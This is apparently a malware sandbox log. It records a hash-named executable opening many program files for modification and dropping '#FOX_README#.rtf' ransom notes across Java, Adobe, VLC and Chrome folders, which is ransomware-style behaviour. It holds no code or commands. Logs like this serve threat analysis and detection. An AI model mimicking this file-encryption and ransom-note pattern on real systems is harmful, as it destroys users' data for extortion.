C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Indianapolis f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Norfolk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tehran f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kolkata f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\jsse.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Blanc-Sablon f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sendopts.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javaws.policy f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Atikokan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tunis f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Rio_Gallegos f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Creston f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\LICENSE f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fiji f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Melbourne f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Swift_Current f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jerusalem f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lord_Howe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyclient.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ct.sym f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Marengo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\New_York f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vevay f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\InvokeMeasure.dot f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dubai f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.RSA f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+7 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\COPYRIGHT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Godthab f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\New_Salem f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_sv.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Currie f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ashgabat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EET f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Syowa f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\localedata.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Managua f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\install.log f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\preloaded_data.pb f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Maldives f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\net.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-2 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\README.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Istanbul f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kwajalein f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\RegisterRequest.mp2v f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Oral f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\v8_context_snapshot.bin f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.expressions_3.4.600.v20140128-0851.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-5 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Glace_Bay f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-nodes.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port_of_Spain f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lindeman f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\README.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\lt.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_HK.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\bin\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rankin_Inlet f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\IA32.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created 